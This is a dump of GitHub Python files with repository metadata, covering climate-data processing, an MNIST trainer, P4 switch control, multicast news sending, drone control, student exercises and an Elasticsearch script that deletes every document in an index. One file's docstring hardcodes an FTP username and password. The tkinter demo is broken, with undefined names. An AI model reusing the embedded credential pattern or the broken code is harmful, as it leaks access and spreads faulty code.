###\n op.drop_table('resposta')\n op.drop_table('ocorrencia')\n op.drop_table('integracao')\n op.drop_index(op.f('ix_usuario_username'), table_name='usuario')\n op.drop_index(op.f('ix_usuario_pis'), table_name='usuario')\n op.drop_index(op.f('ix_usuario_nome'), table_name='usuario')\n op.drop_index(op.f('ix_usuario_email'), table_name='usuario')\n op.drop_table('usuario')\n # ### end Alembic commands ###\n","repo_name":"VictorCoutinho86/timesheet","sub_path":"migrations/versions/c3a545577055_configuração_inicial_do_banco_de_dados.py","file_name":"c3a545577055_configuração_inicial_do_banco_de_dados.py","file_ext":"py","file_size_in_byte":3334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"5521655016","text":"\"\"\"ESMValTool CMORizer for ESACCI-OC data.\n\nTier\n\nSource\n ftp://oceancolour.org/occci-v3.1/geographic/netcdf/monthly/chlor_a/\n user: oc-cci-data\n pass: ELaiWai8ae\n\nLast access\n 20190227\n\nDownload and processing instructions\n In case of issues with data download, check also the information provided at\n OceanColour webpage https://esa-oceancolour-cci.org/\n Put all files under a single directory (no subdirectories with years)\n in ${RAWOBS}/Tier2/ESACCI-OC\n\nModification history\n 20190227-A_lova_to: written.\n\n\"\"\"\n\nimport glob\nimport logging\nimport os\n\nimport iris\nimport xarray as xr\n\nfrom .utilities import (constant_metadata, fix_coords, fix_var_metadata,\n save_variable, set_global_atts)\n\nlogger = logging.getLogger(__name__)\n\n\ndef _fix_data(cube, var):\n \"\"\"Specific data fixes for different variables.\"\"\"\n logger.info(\"Fixing data ...\")\n with constant_metadata(cube):\n if var == 'chl':\n cube *= 1.e-06\n return cube\n\n\ndef _add_depth_coord(cube):\n \"\"\"Add depth auxiliary coordinate for CMIP5 standard.\"\"\"\n if not cube.coords('depth'):\n depth = 1.\n depth_coord = iris.coords.AuxCoord(\n depth,\n standard_name='depth',\n long_name='depth',\n var_name='depth',\n units='m',\n attributes={'positive': 'down'})\n cube.add_aux_coord(depth_coord)\n cube.coordinates = 'depth'\n\n\ndef extract_variable(var_info, raw_info, out_dir, attrs):\n \"\"\"Extract to all vars.\"\"\"\n var = var_info.short_name\n cubes = iris.load(raw_info['file'])\n rawvar = raw_info['name']\n\n for cube in cubes:\n if cube.var_name == rawvar:\n fix_var_metadata(cube, var_info)\n fix_coords(cube)\n _add_depth_coord(cube)\n _fix_data(cube, var)\n set_global_atts(cube, attrs)\n save_variable(\n cube,\n var,\n out_dir,\n attrs,\n local_keys=['coordinates'],\n unlimited_dimensions=['time'],\n )\n\n\ndef merge_data(in_dir, out_dir, raw_info, bins):\n \"\"\"Merge all data into a single (regridded) file.\"\"\"\n var = raw_info['name']\n do_bin = (bins != 0) and (bins % 2 == 0)\n datafile = sorted(glob.glob(in_dir + '/' + raw_info['file'] + '*.nc'))\n for x in datafile:\n ds = xr.open_dataset(x)\n da = ds[var].sel(lat=slice(None, None, -1))\n # remove inconsistent attributes\n for thekeys in [\n 'grid_mapping', 'ancillary_variables', 'parameter_vocab_uri'\n ]:\n del da.attrs[thekeys]\n\n if do_bin:\n da = da.coarsen(lat=bins, boundary='exact').mean()\n da = da.coarsen(lon=bins, boundary='exact').mean()\n\n if x == datafile[0]:\n newda = da\n thekeys = [\n 'creator_name', 'creator_url', 'license', 'sensor',\n 'processing_level'\n ]\n dsmeta = dict((y, ds.attrs[y]) for y in thekeys)\n if do_bin:\n dsmeta['BINNING'] = ' '.join([\n 'Data binned using ', \"{}\".format(bins), 'by',\n \"{}\".format(bins), 'cells 
average'\n ])\n else:\n dsmeta['BINNING'] = \"\"\n continue\n\n newda = xr.concat((newda, da), dim='time')\n\n # save to file\n ds = newda.to_dataset(name=var)\n for x, y in dsmeta.items():\n ds.attrs[x] = y\n thekeys = {\n 'lat': {\n '_FillValue': False\n },\n 'lon': {\n '_FillValue': False\n },\n 'time': {\n 'calendar': 'gregorian'\n },\n var: {\n '_FillValue': 1.e20\n }\n }\n datafile = os.path.join(out_dir, raw_info['file'] + '_merged.nc')\n ds.to_netcdf(datafile, encoding=thekeys, unlimited_dims='time')\n\n logger.info(\"Merged data written to: %s\", datafile)\n\n return (datafile, dsmeta['BINNING'])\n\n\ndef cmorization(in_dir, out_dir, cfg, _):\n \"\"\"Cmorization func call.\"\"\"\n cmor_table = cfg['cmor_table']\n glob_attrs = cfg['attributes']\n\n # run the cmorization\n for var, vals in cfg['variables'].items():\n var_info = cmor_table.get_variable(vals['mip'], var)\n glob_attrs['mip'] = vals['mip']\n raw_info = {'name': vals['raw'], 'file': vals['file']}\n\n # merge yearly data and apply binning\n inpfile, addinfo = merge_data(in_dir, out_dir, raw_info,\n cfg['custom']['bin_size'])\n\n logger.info(\"CMORizing var %s from file %s\", var, inpfile)\n raw_info['file'] = inpfile\n glob_attrs['comment'] = addinfo + glob_attrs['comment']\n extract_variable(var_info, raw_info, out_dir, glob_attrs)\n\n # Remove temporary input file\n os.remove(inpfile)\n","repo_name":"aperezpredictia/ESMValTool_Cordex","sub_path":"esmvaltool/cmorizers/obs/cmorize_obs_esacci_oc.py","file_name":"cmorize_obs_esacci_oc.py","file_ext":"py","file_size_in_byte":4855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"18363419120","text":"import numpy as np\nfrom keras.datasets import mnist\nfrom keras.callbacks import ModelCheckpoint, Callback, EarlyStopping\nfrom keras.utils import np_utils\n\nfrom testcallback import TestCallback\nfrom cnnmodel import CNNModel\nimport config\n\n\ndef preprocessing(train: np.ndarray):\n return train.astype(np.float32) / 255\n\n\ndef main(config):\n # data loading & preprocessing\n (X_train_orig, Y_train_orig), (X_test_orig, Y_test_orig) = mnist.load_data()\n X_train = X_train_orig.reshape((-1, 28, 28, 1))\n X_train = preprocessing(X_train)\n X_test = X_test_orig.reshape((-1, 28, 28, 1))\n X_test = preprocessing(X_test)\n Y_train = np_utils.to_categorical(Y_train_orig)\n Y_test = np_utils.to_categorical(Y_test_orig)\n\n print(\"X_train shape: {}\".format(X_train.shape))\n print(\"Y_train shape: {}\".format(Y_train.shape))\n\n model = CNNModel(input_shape=config.INPUT_SHAPE, output_class=config.OUTPUT_CLASS)\n\n model.compile(loss=config.LOSS,\n optimizer=config.OPTIMIZER,\n metrics=config.METRICS)\n\n checkpoint = ModelCheckpoint(config.CHECKPOINT_FILEPATH, monitor='val_loss', verbose=1)\n earlystop = EarlyStopping()\n\n evaluate = TestCallback((X_test, Y_test))\n\n callbacks_list = [\n checkpoint,\n earlystop,\n evaluate,\n ]\n\n model.fit(X_train, Y_train,\n batch_size=64, epochs=10, verbose=1,\n callbacks=callbacks_list, validation_split=0.01)\n\n if config.SAVE_MODEL:\n model.save(config.SAVE_MODEL_FILENAME)\n print(\"Model saved to file: {}\".format(config.SAVE_MODEL_FILENAME))\n\n\nif __name__ == '__main__':\n main(config.Config)\n","repo_name":"leohaipengli/handwritten-digits-recognition","sub_path":"training_app/digitrecognition.py","file_name":"digitrecognition.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} 
+{"seq_id":"34180823560","text":"# common\nfrom common_lib.logger import Logger\nfrom common_lib.event import EventSystem\n\n# local\nfrom local_lib.packet.cpu import CPUPacket, Notification\nfrom local_lib.p4runtime_lib import SwitchConnection\nfrom local_lib.settings import Settings\n\n# other\nfrom time import time\nfrom copy import copy\nfrom typing import Dict, List\nfrom datetime import datetime, timedelta\nfrom scapy.all import ARP, Ether # type: ignore\n\n\nclass L2Entry:\n\n def __init__(self, mac: str, port: int, timestamp: int):\n self._mac = mac\n self._port = port\n self._timestamp = timestamp\n\n def refresh(self, timestamp):\n self._timestamp = timestamp\n\n def get_mac(self):\n return self._mac\n\n def get_port(self):\n return self._port\n\n def set_timestamp(self, timestamp: int) -> None:\n self._timestamp = timestamp\n\n def get_timestamp(self):\n return self._timestamp\n\n def __str__(self):\n return \"MAC: \" + self.get_mac() + \\\n \", Port: \" + str(self.get_port()) + \\\n \", Timestamp: \" + str(datetime.fromtimestamp(self.get_timestamp()))\n\nclass L2Manager:\n def __init__(self,\n logger: Logger,\n settings: Settings,\n event_system: EventSystem,\n switch_connection: SwitchConnection\n ) -> None:\n # utils\n self._logger = logger\n self._settings = settings\n self._switch_connection = switch_connection\n\n # attributes\n self._mapping = { } # type: Dict[ str, L2Entry ]\n self._l2_mapping_timeout = 40 #s\n self._gateway_mac_set = False\n\n event_system.set_interval(self._remove_old_macs, self._l2_mapping_timeout)\n\n def _set_entry(self, entry):\n self._mapping[entry.get_mac()] = entry\n\n def _delete_entry(self, entry):\n del self._mapping[entry.get_mac()]\n\n def _has_entry(self, mac_address):\n return mac_address in self._mapping\n\n def _get_entry(self, mac_address):\n return self._mapping[mac_address]\n\n def _write_l2_entry(self, entry):\n self._logger.debug(\"writing l2 entry (\" + str(entry) + \")\", 4)\n self._set_entry(entry)\n self._switch_connection.write( \\\n table_name=\"ingress.ethernet.forward.mac_dst\", \\\n match_fields={ \"hdr.ethernet.dstAddr\": entry.get_mac() }, \\\n action_name=\"ingress.ethernet.forward.forward\", \\\n action_params={ \"port\": entry.get_port() } \\\n )\n\n self._switch_connection.write(\n table_name=\"ingress.ethernet.learn.mac_src\", \\\n match_fields={ \"hdr.ethernet.srcAddr\": entry.get_mac() }, \\\n action_name=\"ingress.ethernet.learn.src_known\",\n action_params={ \\\n \"port\": entry.get_port(),\n \"refresh_time\": int(datetime.timestamp(datetime.now() + timedelta(seconds=self._l2_mapping_timeout / 2)))\n } \\\n )\n\n def _delete_l2_entry(self, entry):\n self._logger.debug(\"deleting l2 entry (\" + str(entry) + \")\", 4)\n self._delete_entry(entry)\n self._switch_connection.delete( \\\n table_name=\"ingress.ethernet.forward.mac_dst\", \\\n match_fields={ \"hdr.ethernet.dstAddr\": entry.get_mac() } \\\n )\n\n self._switch_connection.delete( \\\n table_name=\"ingress.ethernet.learn.mac_src\", \\\n match_fields={ \"hdr.ethernet.srcAddr\": entry.get_mac() } \\\n )\n\n def _update_l2_entry(self, entry):\n \"\"\"\n update an l2 entry, thus save it in software and write to switch.\n entry: L2Entry\n \"\"\"\n self._logger.debug(\"update entry (\" + str(entry) + \")\")\n # delete old entries -> prevent errors by p4\n if self._has_entry(entry.get_mac()):\n self._delete_l2_entry(entry)\n self._write_l2_entry(entry)\n\n def learn_source(self, packet):\n \"\"\"\n Learn a source mac address.\n packet: CPUPacket\n \"\"\"\n ethernet 
= packet[\"Ether\"]\n self._logger.debug(\"Learn new mac address {mac} on port {port}\"\n .format(mac=ethernet.src, port=packet.port))\n if ethernet.src.lower() == self._settings.get_mac().lower():\n if not self._gateway_mac_set:\n self._switch_connection.write(\n table_name=\"ingress.ethernet.learn.mac_src\", \\\n match_fields={ \"hdr.ethernet.srcAddr\": ethernet.src }, \\\n action_name=\"ingress.ethernet.learn.ignore_source\"\n )\n self._gateway_mac_set = True\n else:\n self._update_l2_entry(L2Entry(ethernet.src, packet.port, int(time())))\n\n def _flood_packet(self, packet: CPUPacket) -> None:\n \"\"\"\n Flood packet to all ports except the ingress port.\n packet: CPUPacket\n \"\"\"\n packets = [] # type: List[ bytes ]\n for i in range(1, self._switch_connection.get_num_ports()):\n if i != packet.port:\n self._logger.debug(\"flooding, port \" + str(i), 4)\n cpu = CPUPacket(reason=\"SEND_DIRECT\", port=i)\n packets += [ bytes(cpu / copy(packet[\"Ether\"])) ]\n\n self._switch_connection.send_packets_out(packets)\n\n def process_packet(self, packet):\n \"\"\"\n process packet\n packet: CPUPacket\n \"\"\"\n\n type = packet.type\n\n if type == Notification(type=\"SRC_MAC_UNKNOWN\").type \\\n or type == Notification(type=\"REFRESH_L2_ENTRY\").type \\\n or type == Notification(type=\"CHANGED_L2_ENTRY\").type:\n self.learn_source(packet)\n cpu = CPUPacket(\n reason=\"SEND\",\n port=packet.port\n )\n self._switch_connection.send_packet_out(bytes(cpu / packet[\"Ether\"]))\n elif type == Notification(type=\"DST_MAC_UNKNOWN\").type:\n self._logger.debug(\"destination mac {mac} unknown\"\n .format(mac=packet[\"Ether\"].dst))\n self._flood_packet(packet)\n elif type == Notification(type=\"ARP\").type:\n arp = packet[\"ARP\"]\n if arp.pdst == self._settings.get_gateway():\n reply = ARP(op=\"is-at\", hwsrc=self._settings.get_mac(),\n psrc=arp.pdst, hwdst=\"FF:FF:FF:FF:FF:FF\",\n pdst=arp.psrc)\n\n cpu = CPUPacket(\n reason=\"SEND_DIRECT\",\n port=packet.port,\n )\n cpu.payload = Ether(src=self._settings.get_mac(), dst=packet[\"Ether\"].src) / reply\n self._switch_connection.send_packet_out(bytes(cpu))\n else:\n self._flood_packet(packet)\n\n def _remove_old_macs(self) -> None:\n self._logger.debug(\"Remove old l2 entries.\")\n old_entries = [ entry for mac, entry in self._mapping.items()\n if datetime.fromtimestamp(entry.get_timestamp()) \\\n + timedelta(seconds=self._l2_mapping_timeout) < datetime.now() ]\n\n for entry in old_entries:\n self._delete_l2_entry(entry)\n","repo_name":"uni-tue-kn/P4sec","sub_path":"local_lib/manager/l2.py","file_name":"l2.py","file_ext":"py","file_size_in_byte":7074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"16166837653","text":"from __future__ import print_function\nimport sys\nimport socket\nimport datetime\nimport time\nimport urllib\nimport urllib2\n\n#------------------------------------------------------------------------------\n\nusage = \"Usage: python lisp-news-sender.py []\"\nsource = \"\"\ngroup = \"\"\nport = \"\"\nmsocket = None\n\n#------------------------------------------------------------------------------\n\ndef bold(string):\n return(\"\\033[1m\" + string + \"\\033[0m\")\n#enddef\n\ndef send_messages(messages):\n ts = datetime.datetime.now().strftime(\"%m/%d/%y %H:%M:%S.%f\")\n for message in messages:\n print(\"Send message at {}:\\n{}\".format(ts, message), end=\" \")\n \n #\n # Send the message.\n # \n try: msocket.sendto(message, (group, port))\n except socket.error as e:\n 
print(\"socket.sendto() failed: {}\".format(e))\n #endtry\n time.sleep(.25)\n #endfor\n#enddef\n\ndef get_cool_message():\n ts = str(time.time()).split(\".\")[0]\n odd_even = int(ts) & 1\n message = \"time is odd\\n\" if odd_even else \"time is even\\n\"\n return([message])\n#enddef\n\ndef get_headlines():\n try:\n u = urllib.urlopen(\"http://finance.yahoo.com/rss/topfinstories\")\n except:\n try:\n u = urllib2.urlopen(\"http://finance.yahoo.com/rss/topfinstories\")\n except:\n return(None)\n #endtry\n #endtry\n\n #endtry\n data = u.read()\n data = data[data.find(\"\")::]\n\n messages = []\n count = 0\n host = socket.gethostname()\n output = bold(\"Sent from multicast source '{}'\\n\".format(host))\n while (True):\n index = data.find(\"\")\n if (index == -1): break\n data = data[index+len(\"<title>\")::]\n index = data.find(\"\")\n if (index == -1): break\n title = data[0:index]\n data = data[index::]\n\n index = data.find(\"\")\n if (index == -1): break\n data = data[index+len(\"\")::]\n index = data.find(\"\")\n if (index == -1): break\n link = data[0:index]\n data = data[index::]\n\n index = data.find(\"\")\n if (index == -1): break\n data = data[index+len(\"\")::]\n index = data.find(\"\")\n if (index == -1): break\n pd = data[0:index]\n data = data[index::]\n\n output += \"Headline: {}\\n Date: {}\\n URL: {}\\n\\n\".format( \\\n bold(title), pd, link)\n\n count += 1\n if (count % 3 == 0):\n messages.append(output)\n output = \"\"\n #endif\n #endwhile\n return(messages)\n#enddef\n\n#------------------------------------------------------------------------------\n\n#\n# Get command line parameters.\n# \nif (len(sys.argv) < 3):\n print(usage)\n exit(1)\n#endif\n\nsource = sys.argv[1]\ngroup = sys.argv[2]\ndelay = int(sys.argv[3]) if (len(sys.argv) == 4) else 15\n\nif (source.find(\".\") == -1 or group.find(\".\") == -1):\n print(\"Must supply IPv4 address in dotted decimal\")\n exit(1)\n#endif\n\nport = group.split(\".\")\nport = 0x800 + int(port[-2]) + int(port[-1])\n\n#\n# Open send UDP socket.\n#\nprint(\"Open send socket ({} -> {}:{}) ... \".format(source, group, port),\n end=\" \")\n\ntry:\n msocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n msocket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 32)\n msocket.bind((source, 0))\n print(\"succeeded\")\nexcept:\n print(\"failed\")\n exit(1)\n#endtry\n\n#\n# Start off looping and sending system status.\n#\nwhile (True):\n messages = get_headlines()\n if (messages != None): send_messages(messages)\n\n print(\"Delay {} seconds ... \".format(delay), end=\" \")\n sys.stdout.flush()\n time.sleep(delay)\n print(\"\")\n\n messages = get_cool_message()\n send_messages(messages)\n\n print(\"Delay {} seconds ... 
\".format(delay), end=\" \")\n sys.stdout.flush()\n time.sleep(delay)\n print(\"\")\n#endwhile\n\nmsocket.close()\nexit(0)\n\n#------------------------------------------------------------------------------\n\n","repo_name":"farinacci/lispers.net","sub_path":"apps/lisp-news-sender.py","file_name":"lisp-news-sender.py","file_ext":"py","file_size_in_byte":4011,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"85"} +{"seq_id":"7143625492","text":"#This imports the tkinter \"tool box\" this contains\n#all of the support material to make GUI elements\n#by including \"as tk\" we are giving a short name to use.\nimport tkinter as tk\n\n\n#Main window\nroot = tk.Tk() #Creates standard window\n# Step one: construct the object: Build and configure it.\n# Step two: Configure the object: Specify behavouir and settings (optional).\n# Step three Pack the object: Put it in the window.\noutput = tk.Text (root,height = 10, width = 30) #Parameters are what are sent\n# ordered parameters: The order I send the parameters matters. (COMMON)\n# Named parameters: JavaScript and python specific\noutput.config(state = \"disable\", background = \"blue\")\noutput.grid(row = 0, column = 0, rowspan = 5)\n\n\n#**********WIDGET 2,3,4 (Labels)************\n\nlabInput1 = tk.Label(root, text = \"input 1\")\nlabInput1.grid(row = 5, column = 0)\n\nlabInput2 = tk.Label(root, text = \"input 2\")\nlabInput2.grid(row = 6, column = 0)\n\nlabInput3 = tk.Label(root, text = \"input 3\")\nlabInput3.grid(row = 7, column = 0)\n\n\n#**********WIDGET 5,6 (Checkboxes)***********\n#How do I track the checkbox state.\nvar1 = IntVar()\nvar2 = Intvar()\n\n\n#What the named parameter variable does is binds the IntVar to the\n#checkbox. If there is a change in the box, there is a change in the variable.\n#This is called BINDING\n\nc = Checkbutton(root, text=\"Expand\", variable=var1)\ncHC.grid(row = 0, column = 1)\n\nc = Checkbutton(root, text=\"Expand\", variable=var2)\ncHC.grid(row = 1, column = 1)\n\n#This is an event driven program\n#Build a GUI\n#Start it running\n#Wait for \"EVENT\"\n\nroot.mainloop() #Starts the program.","repo_name":"sstack6778/Year9Design01PythonSS","sub_path":"StockDataProject/GUIdemoProgram.py","file_name":"GUIdemoProgram.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"30431966756","text":"from pytz import unicode\n\nimport cy_kit\nimport cy_es\nfrom cy_xdoc.services.search_engine import SearchEngine\nse:SearchEngine = cy_kit.singleton(SearchEngine)\nimport re\nimport unicodedata\n\n\ndef no_accent_vietnamese(s):\n s = s.decode('utf-8')\n s = re.sub(u'Đ', 'D', s)\n s = re.sub(u'đ', 'd', s)\n return unicodedata.normalize('NFKD', unicode(s)).encode('ASCII', 'ignore')\nindex= \"lv-codx_lv-docs\"\nitems = cy_es.get_docs(\n client=se.client,\n index= index)\n\nfor x in items:\n cy_es.delete_doc(\n client=se.client,\n index=index,\n id= x.id\n )\n print(x)","repo_name":"nttlong/fs-svc-01","sub_path":"cyx/fix_es.py","file_name":"fix_es.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"75133944276","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom matplotlib.animation import FuncAnimation\r\n\r\n\r\ndef next_point(u, v):\r\n j = np.random.randint(0, m)\r\n return alpha * u + (1 - alpha) * X[j], alpha * v + (1 - alpha) * Y[j]\r\n\r\n\r\ndef 
proportion(n):\r\n half = n // 2\r\n return np.sqrt((1 - np.cos(half * 2 * np.pi / n)) / (1 - np.cos(2 * np.pi / n)))\r\n\r\n\r\ndef alpha_calc(n):\r\n return 1 / (proportion(n) + 1)\r\n\r\n\r\n# parameters:\r\nm = 7 # number of sides\r\nalpha = alpha_calc(m) # next_point = alpha * prev_point + (1 - alpha) * vertex\r\n# alpha = 0.33\r\nN = 100000 # number of points\r\nanimation = False\r\n\r\nfig = plt.figure(figsize=(7, 7))\r\nplt.xlim(-1.1, 1.1)\r\nplt.ylim(-1.1, 1.1)\r\n\r\n# polygon\r\nX = np.cos(2 * np.pi * np.array(range(m)) / m)\r\nY = np.sin(2 * np.pi * np.array(range(m)) / m)\r\n\r\nA = []\r\nB = []\r\na, b = np.random.uniform(-1, 1), np.random.uniform(-1, 1)\r\nfor _ in range(N):\r\n a, b = next_point(a, b)\r\n A.append(a)\r\n B.append(b)\r\n\r\nif animation:\r\n graph, = plt.plot([], [], 'g.')\r\n\r\n def animate(i):\r\n graph.set_data(A[:i+1], B[:i+1])\r\n return graph\r\n\r\n plt.plot(X, Y, 'ro')\r\n ani = FuncAnimation(fig, animate, frames=N, interval=1)\r\n\r\nelse:\r\n plt.plot(X, Y, 'ro')\r\n plt.plot(A, B, 'g,')\r\n\r\nprint(f'alpha = {alpha}')\r\nplt.show()\r\n","repo_name":"vadimrogov0610/polygon_fractals","sub_path":"polygon_fractals.py","file_name":"polygon_fractals.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"1236541413","text":"# Tee ratkaisusi tähän:\nfrom turtle import Vec2D\n\n\nclass Maksukortti:\n def __init__(self, alkusaldo: float):\n\n self.saldo = alkusaldo\n\n def __str__(self):\n\n return f\"Kortilla on rahaa {self.saldo:.1f} euroa\"\n\n def syo_edullisesti(self):\n\n if self.saldo >= 2.6:\n\n self.saldo -= 2.6\n\n\n def syo_maukkaasti(self):\n\n if self.saldo >= 4.6:\n\n self.saldo -= 4.6\n\n def lataa_rahaa(self, lataa: float):\n\n if lataa < 0:\n raise ValueError\n else:\n self.saldo += lataa\n\n\n\n\npekan_kortti = Maksukortti(20)\nmatin_kortti = Maksukortti(30)\n\npekan_kortti.syo_maukkaasti()\nmatin_kortti.syo_edullisesti()\n\nprint(\"Pekka: \" + str(pekan_kortti))\nprint(\"Matti: \" + str(matin_kortti))\n\npekan_kortti.lataa_rahaa(20)\nmatin_kortti.syo_maukkaasti()\n\nprint(\"Pekka: \" + str(pekan_kortti))\nprint(\"Matti: \" + str(matin_kortti))\n\npekan_kortti.syo_edullisesti()\npekan_kortti.syo_edullisesti()\n\nmatin_kortti.lataa_rahaa(50)\n\nprint(\"Pekka: \" + str(pekan_kortti))\nprint(\"Matti: \" + str(matin_kortti))\n\n\n\n\n\n\n","repo_name":"gary8x6/mooc-ohjelmointi-2022","sub_path":"osa08-13_maksukortti/src/maksukortti.py","file_name":"maksukortti.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"16325020505","text":"import os.path\nimport json\nfrom datetime import datetime\nfrom models.borrow_data import borrow_data\n\n\nclass borrow_data_repository:\n NAME = \"db/borrow.json\"\n\n\n def load(self):\n self.borrow_data_list = []\n\n # Check if file exists.\n if not os.path.isfile(borrow_data_repository.NAME):\n return\n\n # Reading file.\n with open(borrow_data_repository.NAME, \"r\") as infs:\n raw = json.load(infs)\n\n if not raw[\"data\"] or not isinstance(raw[\"data\"], list):\n # Invalid file content.\n infs.close()\n os.unlink(borrow_data_repository.NAME)\n else:\n # Deserializing.\n for r in raw[\"data\"]:\n b = borrow_data()\n b.nim = r[\"nim\"]\n b.isbn = r[\"isbn\"]\n b.start_date = datetime.fromtimestamp(r[\"start_date\"])\n b.is_returned = r[\"is_returned\"]\n b.return_date = 
datetime.fromtimestamp(r[\"return_date\"])\n self.borrow_data_list.append(b)\n\n\n def save(self):\n if not os.path.isdir(\"db\"): os.mkdir(\"db\")\n\n with open(borrow_data_repository.NAME, \"w+\") as outfs:\n # Serializing.\n raw = {}\n raw[\"data\"] = []\n\n for b in self.borrow_data_list:\n r = {}\n r[\"nim\"] = b.nim\n r[\"isbn\"] = b.isbn\n r[\"start_date\"] = b.start_date.timestamp()\n r[\"is_returned\"] = b.is_returned \n r[\"return_date\"] = b.return_date.timestamp()\n raw[\"data\"].append(r)\n\n # Saving.\n json.dump(raw, outfs)\n\n\n def __init__(self):\n self.load()\n\n\n def create(self, borrow_data):\n self.borrow_data_list.append(borrow_data)\n self.save()\n\n\n def get(self, nim, isbn):\n result = None\n\n for data in self.borrow_data_list:\n if data.nim == nim and data.isbn == isbn:\n # Get the last entry.\n result = data\n\n return result\n\n\n def list_non_returned(self):\n return [\n x for x in self.borrow_data_list\n if not x.is_returned\n ]\n\n\n def set_return_date(self, nim, isbn, date):\n data = self.get(nim, isbn)\n data.is_returned = True\n data.return_date = date\n self.save()\n\n\n def delete_by_nim(self, nim):\n self.borrow_data_list = [\n x for x in self.borrow_data_list\n if x.nim != nim\n ]\n self.save()\n\n\n def delete_by_isbn(self, isbn):\n self.borrow_data_list = [\n x for x in self.borrow_data_list\n if x.isbn != isbn\n ]\n self.save()","repo_name":"ivanjx/college","sub_path":"old/smt3/librarian/repositories/borrow_data_repository.py","file_name":"borrow_data_repository.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"8743325451","text":"from djitellopy import Tello\nimport tkinter, time, winsound\n\ndef warning():\n for n in range(4): # 4 short beeps\n winsound.Beep(1500, 500)\n time.sleep(0.5)\n winsound.Beep(1500, 1000) # 1 long beep\n\ntello = Tello()\ntello.connect()\n# Activate the mission pads\ntello.enable_mission_pads()\ntello.set_mission_pad_detection_direction(0) # use downward camera\n# Take off\nwarning()\ntello.takeoff()\ntello.send_rc_control(0, 30, 0, 0) # Move forward\n\npad = tello.get_mission_pad_id() # Look for a mission pad\nwhile pad != 1: # While we don't see pad 1\n if pad == 4: # If we see pad 4\n winsound.Beep(2500, 500)\n pad = tello.get_mission_pad_id()# Take another look\n\n# Land\ntello.disable_mission_pads()\ntello.land()\ntello.end()\n\n","repo_name":"paulbaumgarten/tello-drone-experimenting","sub_path":"mission-pads-demo.py","file_name":"mission-pads-demo.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"8685977174","text":"# update method\n\nuser_info={\n 'name':'uttam',\n 'age': 18,\n 'fav_movies': ['1899'],\n 'fav_tunes': ['animals','24k magic'],\n}\n\nmore_info= {'state' : 'DELHI', 'hobbies' : ['coding','reading','chess']}\nuser_info.update({})\nprint(user_info)\n","repo_name":"uttam-aggarwal/week2-Python-CipherSchools","sub_path":"lecture120-Update_Dictionary-CipherSchools.py","file_name":"lecture120-Update_Dictionary-CipherSchools.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"30704913158","text":"# https://www.acmicpc.net/problem/11375\nimport sys\nfrom collections import defaultdict\n\nread = sys.stdin.readline\nn, m = map(int, read().strip().split())\nadj = defaultdict(list)\nfor i in range(1, n + 
1):\n adj[i].extend(list(map(int, read().strip().split()[1:])))\n\nworks = [0 for _ in range(m + 1)]\n\n\ndef dfs(cur):\n for nxt in adj[cur]:\n if visit[nxt]:\n continue\n visit[nxt] = True\n\n if works[nxt] == 0 or dfs(works[nxt]):\n works[nxt] = cur\n return True\n return False\n\n\nfor i in range(1, n + 1):\n visit = [False for _ in range(m + 1)]\n dfs(i)\n\nprint(len(list(filter(lambda x: x != 0, works))))\n","repo_name":"naemoo/Algorithm-Python","sub_path":"Network Flow/Problem03.py","file_name":"Problem03.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"17068377706","text":"'''\r\nFile Name : baseline_activities.py\r\nAuthor Name : Lakshmi Damodara\r\nCreation Date : 02/02/2018\r\nUpdation Date :\r\nVersion : 1.0\r\nDescription :\r\n\r\nThis program reads the Solar CCT excel file and gets the baseline data to populate public.activities table\r\nThe cell positions for data values are given in the config file excel_activity_config.ini file.\r\n\r\nFunctions:\r\nconverDate, getActivityNameCellPosition, getUnitNameCellPosition, getContractorNameCellPosition\r\ngetPlannedStartCellPosition, getPlannedEndCellPosition\r\n\r\nFiles need to run this program:\r\n1. excel_activity_config.ini\r\n2. excel_config.ini\r\n\r\nProgram dependencies:\r\n1. excel_config_reader.py\r\n2. excel_writing.py\r\n3. excel_utilities.py\r\n\r\nLog File\r\n1. log_file.txt : has been set at the DEBUG level to log all activities at run time.\r\n\r\n'''\r\n\r\nimport datetime\r\nimport xlrd\r\n\r\n### -- Start of Functions --------\r\n# function to convert dates to string in mmddyyyy format\r\ndef convertDate(dtt):\r\n return datetime.datetime.date(dtt) # returns just the date in mm-dd-yyyy format\r\n\r\n#returns the cell position of project name from excel_activity_config.ini\r\ndef getProjectName(config):\r\n return config['Project']['projectName']\r\n\r\ndef getActivityNameCellPosition(config, pos): #returns the value of activities_name from excel_act_tble_config.ini\r\n keyVal = 'activities' + str(pos)\r\n cell_postion = config[keyVal]['activities_name']\r\n return cell_postion\r\n\r\n#returns the value of unit name from excel_act_tble_config.ini\r\ndef getUnitNameCellPosition(config, pos):\r\n keyVal = 'activities' + str(pos)\r\n cell_postion = config[keyVal]['activities_unit_name']\r\n return 